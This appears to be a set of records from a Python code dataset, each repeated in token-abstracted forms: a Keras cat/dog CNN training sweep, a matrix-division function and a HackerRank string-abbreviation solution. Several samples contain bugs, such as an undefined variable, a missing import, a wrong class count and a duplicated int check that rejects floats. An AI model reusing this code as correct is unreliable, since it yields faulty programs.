conv_layer in conv_layers:\n NAME = \"{}-conv-{}-nodes-{}-dense-{}\".format(conv_layer, layer_size, dense_layer, int(time.time()))\n print(NAME)\n\n model = Sequential()\n\n model.add(Conv2D(layer_size, (3, 3), input_shape=INPUT_SHAPE))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n for l in range(conv_layer-1):\n model.add(Conv2D(layer_size, (5, 5)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n model.add(Dropout(DROPOUT))\n\n model.add(Flatten())\n\n for _ in range(dense_layer):\n model.add(Dense(layer_size))\n model.add(Activation('relu'))\n model.add(Dropout(DROPOUT))\n\n model.add(Dense(NB_CLASSES))\n model.add(Activation('softmax'))\n\n tensorboard = TensorBoard(log_dir=\"logs/{}\".format(NAME))\n\n model.compile(loss='categorical_crossentropy',\n optimizer=OPTIMIZER,\n metrics=['accuracy'],\n )\n\n history = model.fit(x, y,\n batch_size=BATCH_SIZE,\n epochs=NB_EPOCHS,\n validation_split=VALIDATION_SPLIT,\n verbose=1,\n callbacks=[tensorboard])\n if history.history.get('val_acc')[-1] > max:\n max = history.history.get('val_acc')[-1]\n if accIndex >= 2:\n os.remove('{}_{}_{}_{}_{}_{}'.format(accIndex-1, round(max, 4), CBP[0], CBP[1], CBP[2], f\":{date:%Y-%m-%d-%Hh%Mm%Ss}\"))\n val_acc_out = open('{}_{}_{}_{}_{}_{}'.format(accIndex, round(max, 4), CBP[0], CBP[1], CBP[2], f\":{date:%Y-%m-%d-%Hh%Mm%Ss}\"), \"wb\")\n pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(accIndex, round(max, 4), CBP[0], CBP[1], CBP[2], f\":{date:%Y-%m-%d-%Hh%Mm%Ss}\")),\n val_acc_out)\n val_acc_out.close()\n accIndex += 1\n\n pickle_upload = open('{}_pickle'.format(accIndex - 1), 'rb')\n p_upload = pickle.load(pickle_upload)\n print(p_upload)\n\n\n if history.history.get('val_loss')[-1] < min:\n min = history.history.get('val_loss')[-1]\n if lossIndex>=2:\n os.remove('{}_{}_{}_{}_{}_{}'.format(lossIndex-1, round(min, 4), CBP[0], CBP[1], CBP[2], f\":{date:%Y-%m-%d-%Hh%Mm%Ss}\"))\n val_loss_out = open('{}_{}_{}_{}_{}_{}'.format(lossIndex, round(min, 4), CBP[0], CBP[1], CBP[2], f\":{date:%Y-%m-%d-%Hh%Mm%Ss}\"))\n pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(lossIndex, round(min, 4), CBP[0], CBP[1], CBP[2], f\":{date:%Y-%m-%d-%Hh%Mm%Ss}\")),\n val_loss_out)\n val_loss_out.close()\n lossIndex += 1\n\n\n\n\nmodel.save('64x3-CNN.model')\n\n\nCATEGORIES = [\"Dog\", \"Cat\"] # will use this to convert prediction num to string value\n\n\ndef prepare(filepath):\n IMG_SIZE = 299 # 50 in txt-based\n img_array = cv2.imread(filepath, cv2.IMREAD_COLOR) # read in the image, convert to grayscale\n resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE)) # resize image to match model's expected sizing\n return resized_img_array.reshape(-1, IMG_SIZE, IMG_SIZE, 3) # return the image with shaping that TF wants.\n\n\nmodel = tf.keras.models.load_model(\"64x3-CNN.model\")\nprediction = model.predict([prepare('dog.jpg')]) # REMEMBER YOU'RE PASSING A LIST OF THINGS YOU WISH TO PREDICT\nprint(prediction)\nprint(prediction[0][0])\n\nprint(CATEGORIES[int(prediction[0][0])])\n\n\n#We can also test our cat example:\n\nprediction = model.predict([prepare('cat.jpg')])\nprint(prediction) # will be a list in a list.\nprint(CATEGORIES[int(prediction[0][0])])\n\n\n\n'''\nalpha. Also referred to as the learning rate or step size. The proportion that weights are updated (e.g. 0.001). Larger values (e.g. 0.3) results in faster initial learning before the rate is updated. Smaller values (e.g. 1.0E-5) slow learning right down during training\nbeta1. 
The exponential decay rate for the first moment estimates (e.g. 0.9).\nbeta2. The exponential decay rate for the second-moment estimates (e.g. 0.999). This value should be set close to 1.0 on problems with a sparse gradient (e.g. NLP and computer vision problems).\nepsilon. Is a very small number to prevent any division by zero in the implementation (e.g. 10E-8).\n\nWe can see that the popular deep learning libraries generally use the default parameters recommended by the paper.\n\nTensorFlow: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-08.\nKeras: lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0.\nBlocks: learning_rate=0.002, beta1=0.9, beta2=0.999, epsilon=1e-08, decay_factor=1.\nLasagne: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-08\nCaffe: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-08\nMxNet: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-8\nTorch: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-8\n\n\n\n\n'''", "<docstring token>\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport cv2\nimport pickle\nimport random\nimport datetime\nimport tensorflow as tf\nfrom tensorflow.python.keras.datasets import cifar10\nfrom tensorflow.python.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.python.keras.models import Sequential\nfrom tensorflow.python.keras.layers import Activation, Dense, Flatten, Dropout\nfrom tensorflow.python.keras.layers import Conv2D, MaxPooling2D\nfrom tensorflow.python.keras.optimizers import Adam\nfrom tensorflow.python.keras.callbacks import TensorBoard\nDATADIR = 'content/PetImages'\nCATEGORIES = ['Cat', 'Dog']\nimg_array = []\nfor category in CATEGORIES:\n path = os.path.join(DATADIR, category)\n for img in os.listdir(path):\n img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR)\n plt.imshow(img_array, cmap='gray')\n plt.show()\n print(img_array)\n print(img_array.shape)\n break\n break\nIMG_SIZE = 299\nresized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\nplt.imshow(resized_img_array, cmap='gray')\nplt.show()\ntraining_data = []\n\n\ndef create_training_data():\n for category in CATEGORIES:\n path = os.path.join(DATADIR, category)\n classIndex = CATEGORIES.index(category)\n for img in os.listdir(path):\n try:\n img_array = cv2.imread(os.path.join(path, img), cv2.\n IMREAD_COLOR)\n resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n training_data.append([resized_img_array, classIndex])\n except Exception as e:\n pass\n\n\ncreate_training_data()\nprint(len(training_data))\n<docstring token>\nrandom.shuffle(training_data)\nx = []\ny = []\nfor features, label in training_data:\n x.append(features)\n y.append(label)\nx = np.array(x).reshape(-1, IMG_SIZE, IMG_SIZE, 3)\npickle_out = open('x.pickle', 'wb')\npickle.dump(x, pickle_out)\npickle_out.close()\npickle_out = open('y.pickle', 'wb')\npickle.dump(y, pickle_out)\npickle_out.close()\npickle_in = open('x.pickle', 'rb')\nx = pickle.load(pickle_in)\npickle_in = open('y.pickle', 'rb')\ny = pickle.load(pickle_in)\nx = x / 255.0\nINPUT_SHAPE = x.shape[1:]\nDROPOUT = 0.2\nNB_CLASSES = 10\nNB_EPOCHS = 10\nBATCH_SIZE = 128\nVALIDATION_SPLIT = 0.2\nOPTIMIZER = Adam()\nmax, min, accIndex, lossIndex = 70.0, 4.0, 1, 1\ndate = datetime.datetime.now()\ndense_layers = [2, 1, 0]\nlayer_sizes = [512, 256, 128, 64]\nconv_layers = [3, 2, 1]\nfor dense_layer in dense_layers:\n for layer_size in layer_sizes:\n for conv_layer in conv_layers:\n NAME = 
'{}-conv-{}-nodes-{}-dense-{}'.format(conv_layer,\n layer_size, dense_layer, int(time.time()))\n print(NAME)\n model = Sequential()\n model.add(Conv2D(layer_size, (3, 3), input_shape=INPUT_SHAPE))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n for l in range(conv_layer - 1):\n model.add(Conv2D(layer_size, (5, 5)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n model.add(Dropout(DROPOUT))\n model.add(Flatten())\n for _ in range(dense_layer):\n model.add(Dense(layer_size))\n model.add(Activation('relu'))\n model.add(Dropout(DROPOUT))\n model.add(Dense(NB_CLASSES))\n model.add(Activation('softmax'))\n tensorboard = TensorBoard(log_dir='logs/{}'.format(NAME))\n model.compile(loss='categorical_crossentropy', optimizer=\n OPTIMIZER, metrics=['accuracy'])\n history = model.fit(x, y, batch_size=BATCH_SIZE, epochs=\n NB_EPOCHS, validation_split=VALIDATION_SPLIT, verbose=1,\n callbacks=[tensorboard])\n if history.history.get('val_acc')[-1] > max:\n max = history.history.get('val_acc')[-1]\n if accIndex >= 2:\n os.remove('{}_{}_{}_{}_{}_{}'.format(accIndex - 1,\n round(max, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))\n val_acc_out = open('{}_{}_{}_{}_{}_{}'.format(accIndex,\n round(max, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'), 'wb')\n pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(accIndex,\n round(max, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_acc_out)\n val_acc_out.close()\n accIndex += 1\n pickle_upload = open('{}_pickle'.format(accIndex - 1), 'rb')\n p_upload = pickle.load(pickle_upload)\n print(p_upload)\n if history.history.get('val_loss')[-1] < min:\n min = history.history.get('val_loss')[-1]\n if lossIndex >= 2:\n os.remove('{}_{}_{}_{}_{}_{}'.format(lossIndex - 1,\n round(min, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))\n val_loss_out = open('{}_{}_{}_{}_{}_{}'.format(lossIndex,\n round(min, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))\n pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(lossIndex,\n round(min, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_loss_out)\n val_loss_out.close()\n lossIndex += 1\nmodel.save('64x3-CNN.model')\nCATEGORIES = ['Dog', 'Cat']\n\n\ndef prepare(filepath):\n IMG_SIZE = 299\n img_array = cv2.imread(filepath, cv2.IMREAD_COLOR)\n resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n return resized_img_array.reshape(-1, IMG_SIZE, IMG_SIZE, 3)\n\n\nmodel = tf.keras.models.load_model('64x3-CNN.model')\nprediction = model.predict([prepare('dog.jpg')])\nprint(prediction)\nprint(prediction[0][0])\nprint(CATEGORIES[int(prediction[0][0])])\nprediction = model.predict([prepare('cat.jpg')])\nprint(prediction)\nprint(CATEGORIES[int(prediction[0][0])])\n<docstring token>\n", "<docstring token>\n<import token>\nDATADIR = 'content/PetImages'\nCATEGORIES = ['Cat', 'Dog']\nimg_array = []\nfor category in CATEGORIES:\n path = os.path.join(DATADIR, category)\n for img in os.listdir(path):\n img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR)\n plt.imshow(img_array, cmap='gray')\n plt.show()\n print(img_array)\n print(img_array.shape)\n break\n break\nIMG_SIZE = 299\nresized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\nplt.imshow(resized_img_array, cmap='gray')\nplt.show()\ntraining_data = []\n\n\ndef create_training_data():\n for category in CATEGORIES:\n path = os.path.join(DATADIR, category)\n classIndex = CATEGORIES.index(category)\n for img 
in os.listdir(path):\n try:\n img_array = cv2.imread(os.path.join(path, img), cv2.\n IMREAD_COLOR)\n resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n training_data.append([resized_img_array, classIndex])\n except Exception as e:\n pass\n\n\ncreate_training_data()\nprint(len(training_data))\n<docstring token>\nrandom.shuffle(training_data)\nx = []\ny = []\nfor features, label in training_data:\n x.append(features)\n y.append(label)\nx = np.array(x).reshape(-1, IMG_SIZE, IMG_SIZE, 3)\npickle_out = open('x.pickle', 'wb')\npickle.dump(x, pickle_out)\npickle_out.close()\npickle_out = open('y.pickle', 'wb')\npickle.dump(y, pickle_out)\npickle_out.close()\npickle_in = open('x.pickle', 'rb')\nx = pickle.load(pickle_in)\npickle_in = open('y.pickle', 'rb')\ny = pickle.load(pickle_in)\nx = x / 255.0\nINPUT_SHAPE = x.shape[1:]\nDROPOUT = 0.2\nNB_CLASSES = 10\nNB_EPOCHS = 10\nBATCH_SIZE = 128\nVALIDATION_SPLIT = 0.2\nOPTIMIZER = Adam()\nmax, min, accIndex, lossIndex = 70.0, 4.0, 1, 1\ndate = datetime.datetime.now()\ndense_layers = [2, 1, 0]\nlayer_sizes = [512, 256, 128, 64]\nconv_layers = [3, 2, 1]\nfor dense_layer in dense_layers:\n for layer_size in layer_sizes:\n for conv_layer in conv_layers:\n NAME = '{}-conv-{}-nodes-{}-dense-{}'.format(conv_layer,\n layer_size, dense_layer, int(time.time()))\n print(NAME)\n model = Sequential()\n model.add(Conv2D(layer_size, (3, 3), input_shape=INPUT_SHAPE))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n for l in range(conv_layer - 1):\n model.add(Conv2D(layer_size, (5, 5)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n model.add(Dropout(DROPOUT))\n model.add(Flatten())\n for _ in range(dense_layer):\n model.add(Dense(layer_size))\n model.add(Activation('relu'))\n model.add(Dropout(DROPOUT))\n model.add(Dense(NB_CLASSES))\n model.add(Activation('softmax'))\n tensorboard = TensorBoard(log_dir='logs/{}'.format(NAME))\n model.compile(loss='categorical_crossentropy', optimizer=\n OPTIMIZER, metrics=['accuracy'])\n history = model.fit(x, y, batch_size=BATCH_SIZE, epochs=\n NB_EPOCHS, validation_split=VALIDATION_SPLIT, verbose=1,\n callbacks=[tensorboard])\n if history.history.get('val_acc')[-1] > max:\n max = history.history.get('val_acc')[-1]\n if accIndex >= 2:\n os.remove('{}_{}_{}_{}_{}_{}'.format(accIndex - 1,\n round(max, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))\n val_acc_out = open('{}_{}_{}_{}_{}_{}'.format(accIndex,\n round(max, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'), 'wb')\n pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(accIndex,\n round(max, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_acc_out)\n val_acc_out.close()\n accIndex += 1\n pickle_upload = open('{}_pickle'.format(accIndex - 1), 'rb')\n p_upload = pickle.load(pickle_upload)\n print(p_upload)\n if history.history.get('val_loss')[-1] < min:\n min = history.history.get('val_loss')[-1]\n if lossIndex >= 2:\n os.remove('{}_{}_{}_{}_{}_{}'.format(lossIndex - 1,\n round(min, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))\n val_loss_out = open('{}_{}_{}_{}_{}_{}'.format(lossIndex,\n round(min, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))\n pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(lossIndex,\n round(min, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_loss_out)\n val_loss_out.close()\n lossIndex += 1\nmodel.save('64x3-CNN.model')\nCATEGORIES = ['Dog', 'Cat']\n\n\ndef 
prepare(filepath):\n IMG_SIZE = 299\n img_array = cv2.imread(filepath, cv2.IMREAD_COLOR)\n resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n return resized_img_array.reshape(-1, IMG_SIZE, IMG_SIZE, 3)\n\n\nmodel = tf.keras.models.load_model('64x3-CNN.model')\nprediction = model.predict([prepare('dog.jpg')])\nprint(prediction)\nprint(prediction[0][0])\nprint(CATEGORIES[int(prediction[0][0])])\nprediction = model.predict([prepare('cat.jpg')])\nprint(prediction)\nprint(CATEGORIES[int(prediction[0][0])])\n<docstring token>\n", "<docstring token>\n<import token>\n<assignment token>\nfor category in CATEGORIES:\n path = os.path.join(DATADIR, category)\n for img in os.listdir(path):\n img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR)\n plt.imshow(img_array, cmap='gray')\n plt.show()\n print(img_array)\n print(img_array.shape)\n break\n break\n<assignment token>\nplt.imshow(resized_img_array, cmap='gray')\nplt.show()\n<assignment token>\n\n\ndef create_training_data():\n for category in CATEGORIES:\n path = os.path.join(DATADIR, category)\n classIndex = CATEGORIES.index(category)\n for img in os.listdir(path):\n try:\n img_array = cv2.imread(os.path.join(path, img), cv2.\n IMREAD_COLOR)\n resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n training_data.append([resized_img_array, classIndex])\n except Exception as e:\n pass\n\n\ncreate_training_data()\nprint(len(training_data))\n<docstring token>\nrandom.shuffle(training_data)\n<assignment token>\nfor features, label in training_data:\n x.append(features)\n y.append(label)\n<assignment token>\npickle.dump(x, pickle_out)\npickle_out.close()\n<assignment token>\npickle.dump(y, pickle_out)\npickle_out.close()\n<assignment token>\nfor dense_layer in dense_layers:\n for layer_size in layer_sizes:\n for conv_layer in conv_layers:\n NAME = '{}-conv-{}-nodes-{}-dense-{}'.format(conv_layer,\n layer_size, dense_layer, int(time.time()))\n print(NAME)\n model = Sequential()\n model.add(Conv2D(layer_size, (3, 3), input_shape=INPUT_SHAPE))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n for l in range(conv_layer - 1):\n model.add(Conv2D(layer_size, (5, 5)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n model.add(Dropout(DROPOUT))\n model.add(Flatten())\n for _ in range(dense_layer):\n model.add(Dense(layer_size))\n model.add(Activation('relu'))\n model.add(Dropout(DROPOUT))\n model.add(Dense(NB_CLASSES))\n model.add(Activation('softmax'))\n tensorboard = TensorBoard(log_dir='logs/{}'.format(NAME))\n model.compile(loss='categorical_crossentropy', optimizer=\n OPTIMIZER, metrics=['accuracy'])\n history = model.fit(x, y, batch_size=BATCH_SIZE, epochs=\n NB_EPOCHS, validation_split=VALIDATION_SPLIT, verbose=1,\n callbacks=[tensorboard])\n if history.history.get('val_acc')[-1] > max:\n max = history.history.get('val_acc')[-1]\n if accIndex >= 2:\n os.remove('{}_{}_{}_{}_{}_{}'.format(accIndex - 1,\n round(max, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))\n val_acc_out = open('{}_{}_{}_{}_{}_{}'.format(accIndex,\n round(max, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'), 'wb')\n pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(accIndex,\n round(max, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_acc_out)\n val_acc_out.close()\n accIndex += 1\n pickle_upload = open('{}_pickle'.format(accIndex - 1), 'rb')\n p_upload = pickle.load(pickle_upload)\n print(p_upload)\n if 
history.history.get('val_loss')[-1] < min:\n min = history.history.get('val_loss')[-1]\n if lossIndex >= 2:\n os.remove('{}_{}_{}_{}_{}_{}'.format(lossIndex - 1,\n round(min, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))\n val_loss_out = open('{}_{}_{}_{}_{}_{}'.format(lossIndex,\n round(min, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))\n pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(lossIndex,\n round(min, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_loss_out)\n val_loss_out.close()\n lossIndex += 1\nmodel.save('64x3-CNN.model')\n<assignment token>\n\n\ndef prepare(filepath):\n IMG_SIZE = 299\n img_array = cv2.imread(filepath, cv2.IMREAD_COLOR)\n resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n return resized_img_array.reshape(-1, IMG_SIZE, IMG_SIZE, 3)\n\n\n<assignment token>\nprint(prediction)\nprint(prediction[0][0])\nprint(CATEGORIES[int(prediction[0][0])])\n<assignment token>\nprint(prediction)\nprint(CATEGORIES[int(prediction[0][0])])\n<docstring token>\n", "<docstring token>\n<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef create_training_data():\n for category in CATEGORIES:\n path = os.path.join(DATADIR, category)\n classIndex = CATEGORIES.index(category)\n for img in os.listdir(path):\n try:\n img_array = cv2.imread(os.path.join(path, img), cv2.\n IMREAD_COLOR)\n resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n training_data.append([resized_img_array, classIndex])\n except Exception as e:\n pass\n\n\n<code token>\n<docstring token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef prepare(filepath):\n IMG_SIZE = 299\n img_array = cv2.imread(filepath, cv2.IMREAD_COLOR)\n resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n return resized_img_array.reshape(-1, IMG_SIZE, IMG_SIZE, 3)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<docstring token>\n", "<docstring token>\n<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef create_training_data():\n for category in CATEGORIES:\n path = os.path.join(DATADIR, category)\n classIndex = CATEGORIES.index(category)\n for img in os.listdir(path):\n try:\n img_array = cv2.imread(os.path.join(path, img), cv2.\n IMREAD_COLOR)\n resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n training_data.append([resized_img_array, classIndex])\n except Exception as e:\n pass\n\n\n<code token>\n<docstring token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<docstring token>\n", "<docstring token>\n<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<code token>\n<docstring token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<docstring token>\n" ]
false
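The docstring closing sample 21 lists Adam's recommended hyperparameters (alpha, beta1, beta2, epsilon). In Keras they map onto the optimizer constructor as below; a sketch using the public tf.keras path rather than the older tensorflow.python.keras import, with a toy model purely for illustration:

import tensorflow as tf

optimizer = tf.keras.optimizers.Adam(
    learning_rate=0.001,  # alpha: the step size
    beta_1=0.9,           # decay rate for the first-moment estimates
    beta_2=0.999,         # decay rate for the second-moment estimates
    epsilon=1e-08,        # guards against division by zero
)
model = tf.keras.Sequential(
    [tf.keras.layers.Dense(2, activation="softmax", input_shape=(4,))])
model.compile(loss="sparse_categorical_crossentropy",
              optimizer=optimizer, metrics=["accuracy"])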
22
95c5971a102fb2ed84ab0de0471278d0167d8359
#!/usr/bin/python3
"""1. Divide a matrix """


def matrix_divided(matrix, div):
    """Divides a Matrix

    Args:
        matrix: A list of lists of ints or floats
        div: a non zero int or float

    Exceptions:
        TypeError: if the matrix and/or div is not as stated or the matrix
        rows are not of the same size
        ZeroDivisionError: if div is zero

    Returns: a new matrix holding the results

    """
    workmat = []
    WrongType = False
    TooLong = False
    i = 0
    if isinstance(matrix, list):
        if matrix == []:
            WrongType = True
        for x in range(len(matrix)):
            if isinstance(matrix[x], list):
                workmat.append([])
                if matrix[x] == []:
                    # an empty row is invalid; the original only checked this
                    # inside the element loop, which never runs for empty rows
                    WrongType = True
                for y in range(len(matrix[x])):
                    if (
                            isinstance(matrix[x][y], int) or
                            isinstance(matrix[x][y], float)  # was int twice
                    ):
                        workmat[x].append(matrix[x][y])
                    else:
                        WrongType = True
                    if x == 0 and y == 0:
                        i = len(matrix[x])
                    else:
                        if not i == len(matrix[x]):
                            TooLong = True
            else:
                WrongType = True
    else:
        WrongType = True
    if WrongType:
        raise TypeError(
            "matrix must be a matrix (list of lists) of integers/floats")
    if TooLong:
        raise TypeError(
            "Each row of the matrix must have the same size")
    if not isinstance(div, float) and not isinstance(div, int):
        raise TypeError(
            "div must be a number")
    if div == 0:
        raise ZeroDivisionError(
            "division by zero")

    for x in range(len(workmat)):
        for y in range(len(workmat[x])):
            workmat[x][y] = round(workmat[x][y] / div, 2)
    return workmat
[ "#!/usr/bin/python3\n\"\"\"1. Divide a matrix \"\"\"\n\n\ndef matrix_divided(matrix, div):\n \"\"\"Divides a Matrix\n\n Args:\n matrix: A list of lists of ints or floats\n div: a non zero int or float\n\n Exceptions:\n TypeError: if the matrix and/or div is not as stated or the matrix elements\n are not of the same size\n ZeroDivisionError: if div is zero\n\n Returns: a new matrix holding the results\n\n \"\"\"\n workmat = []\n WrongType = False\n TooLong = False\n i = 0\n if isinstance(matrix, list):\n if matrix == []:\n WrongType = True\n for x in range(len(matrix)):\n if isinstance(matrix[x], list):\n workmat.append([])\n for y in range(len(matrix[x])):\n if matrix[x] == []:\n WrongType = True\n if (\n isinstance(matrix[x][y], int) or\n isinstance(matrix[x][y], int)\n ):\n workmat[x].append(matrix[x][y])\n else:\n WrongType = True\n if x == 0 and y == 0:\n i = len(matrix[x])\n else:\n if not i == len(matrix[x]):\n TooLong = True\n else:\n WrongType = True\n else:\n WrongType = True\n if WrongType:\n raise TypeError(\n \"matrix must be a matrix (list of lists) of integers/floats\")\n if TooLong:\n raise TypeError(\n \"Each row of the matrix must have the same size\")\n if not isinstance(div, float) and not isinstance(div, int):\n raise TypeError(\n \"div must be a number\")\n if div == 0:\n raise ZeroDivisionError(\n \"division by zero\")\n\n for x in range(len(workmat)):\n for y in range(len(workmat[x])):\n workmat[x][y] = round((workmat[x][y] / div), 2)\n return workmat\n", "<docstring token>\n\n\ndef matrix_divided(matrix, div):\n \"\"\"Divides a Matrix\n\n Args:\n matrix: A list of lists of ints or floats\n div: a non zero int or float\n\n Exceptions:\n TypeError: if the matrix and/or div is not as stated or the matrix elements\n are not of the same size\n ZeroDivisionError: if div is zero\n\n Returns: a new matrix holding the results\n\n \"\"\"\n workmat = []\n WrongType = False\n TooLong = False\n i = 0\n if isinstance(matrix, list):\n if matrix == []:\n WrongType = True\n for x in range(len(matrix)):\n if isinstance(matrix[x], list):\n workmat.append([])\n for y in range(len(matrix[x])):\n if matrix[x] == []:\n WrongType = True\n if isinstance(matrix[x][y], int) or isinstance(matrix[x\n ][y], int):\n workmat[x].append(matrix[x][y])\n else:\n WrongType = True\n if x == 0 and y == 0:\n i = len(matrix[x])\n elif not i == len(matrix[x]):\n TooLong = True\n else:\n WrongType = True\n else:\n WrongType = True\n if WrongType:\n raise TypeError(\n 'matrix must be a matrix (list of lists) of integers/floats')\n if TooLong:\n raise TypeError('Each row of the matrix must have the same size')\n if not isinstance(div, float) and not isinstance(div, int):\n raise TypeError('div must be a number')\n if div == 0:\n raise ZeroDivisionError('division by zero')\n for x in range(len(workmat)):\n for y in range(len(workmat[x])):\n workmat[x][y] = round(workmat[x][y] / div, 2)\n return workmat\n", "<docstring token>\n<function token>\n" ]
false
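matrix_divided above spends most of its lines on validation; the division itself is a nested comprehension. A compact sketch of just the happy path, assuming the input has already been validated as a rectangular numeric matrix:

def matrix_divided_short(matrix, div):
    if div == 0:
        raise ZeroDivisionError("division by zero")
    return [[round(el / div, 2) for el in row] for row in matrix]

print(matrix_divided_short([[1, 2, 3], [4, 5, 6]], 3))
# [[0.33, 0.67, 1.0], [1.33, 1.67, 2.0]]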
23
5fb998fa761b989c6dd423634824197bade4f8a5
""" You can perform the following operations on the string, : Capitalize zero or more of 's lowercase letters. Delete all of the remaining lowercase letters in . Given two strings, and , determine if it's possible to make equal to as described. If so, print YES on a new line. Otherwise, print NO. For example, given and , in we can convert and delete to match . If and , matching is not possible because letters may only be capitalized or discarded, not changed. Function Description Complete the function in the editor below. It must return either or . abbreviation has the following parameter(s): a: the string to modify b: the string to match Input Format The first line contains a single integer , the number of queries. Each of the next pairs of lines is as follows: - The first line of each query contains a single string, . - The second line of each query contains a single string, . Constraints String consists only of uppercase and lowercase English letters, ascii[A-Za-z]. String consists only of uppercase English letters, ascii[A-Z]. Output Format For each query, print YES on a new line if it's possible to make string equal to string . Otherwise, print NO. Sample Input 1 daBcd ABC Sample Output YES Explanation image We have daBcd and ABC. We perform the following operation: Capitalize the letters a and c in so that dABCd. Delete all the remaining lowercase letters in so that ABC. Because we were able to successfully convert to , we print YES on a new line. """ #!/bin/python3 import math import os import random import re import sys # Complete the abbreviation function below. def abbreviation(a, b): m, n = len(a), len(b) dp = [[False]*(m+1) for _ in range(n+1)] dp[0][0] = True for i in range(n+1): for j in range(1,m+1): if a[j-1] == b[i-1]: dp[i][j] = dp[i-1][j-1] elif a[j-1].upper() == b[i-1]: dp[i][j] = dp[i-1][j-1] or dp[i][j-1] elif a[j-1].islower(): dp[i][j] = dp[i][j-1] return "YES" if dp[n][m] else "NO" if __name__ == '__main__': fptr = open(os.environ['OUTPUT_PATH'], 'w') q = int(input()) for q_itr in range(q): a = input() b = input() result = abbreviation(a, b) fptr.write(result + '\n') fptr.close()
